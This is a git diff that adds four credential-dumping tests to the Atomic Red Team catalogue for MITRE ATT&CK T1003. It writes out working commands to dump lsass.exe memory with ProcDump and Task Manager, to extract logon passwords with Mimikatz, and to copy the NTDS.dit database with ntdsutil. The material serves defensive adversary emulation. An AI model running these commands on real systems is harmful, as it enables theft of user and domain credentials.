diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index f75b91da..4baf9220 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -147,6 +147,14 @@ Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>
 
 - [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)
 
+- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump)
+
+- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
+
+- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
+
+- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
+
 
 <br/>
 
@@ -213,3 +221,91 @@ reg save HKLM\system system
 reg save HKLM\security security
 ```
 <br/>
+<br/>
+
+## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals 
+ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
+
+#### Run it with `command_prompt`!
+```
+procdump.exe -accepteula -ma lsass.exe #{output_file}
+```
+<br/>
+<br/>
+
+## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task 
+Manager and administrative permissions.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with these steps!
+1. Open Task Manager:
+  On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking 
+  on the task bar and selecting "Task Manager".
+
+2. Select lsass.exe:
+  If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe 
+  and select it for manipulation.
+
+3. Dump lsass.exe memory:
+  Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Offline Credential Theft With Mimikatz
+The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with 
+Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
+
+#### Run it with these steps!
+1. Open Mimikatz:
+  Execute `mimikatz` at a command prompt.
+
+2. Select a Memory Dump:
+  Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
+
+3. Obtain Credentials:
+  Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
+The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability 
+uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of 
+subsequent domain controllers without the need of network-based replication.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
+
+#### Run it with `command_prompt`!
+```
+ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
+```
+<br/>
diff --git a/atomics/index.md b/atomics/index.md
index d5601c1a..837bfc9f 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -421,6 +421,10 @@
   - Atomic Test #2: Gsecdump [windows]
   - Atomic Test #3: Windows Credential Editor [windows]
   - Atomic Test #4: Registry dump of SAM, creds, and secrets [windows]
+  - Atomic Test #5: Dump LSASS.exe Memory using ProcDump [windows]
+  - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
+  - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
+  - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
 - [T1081 Credentials in Files](./T1081/T1081.md)
   - Atomic Test #1: Browser and System credentials [macos]
   - Atomic Test #2: Extract credentials from files [macos, linux]
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index de159f00..a767df04 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -284,6 +284,10 @@
   - Atomic Test #2: Gsecdump [windows]
   - Atomic Test #3: Windows Credential Editor [windows]
   - Atomic Test #4: Registry dump of SAM, creds, and secrets [windows]
+  - Atomic Test #5: Dump LSASS.exe Memory using ProcDump [windows]
+  - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
+  - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
+  - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
 - [T1081 Credentials in Files](./T1081/T1081.md)
   - Atomic Test #3: Mimikatz & Kittenz [windows]
   - Atomic Test #4: Extracting credentials from files [windows]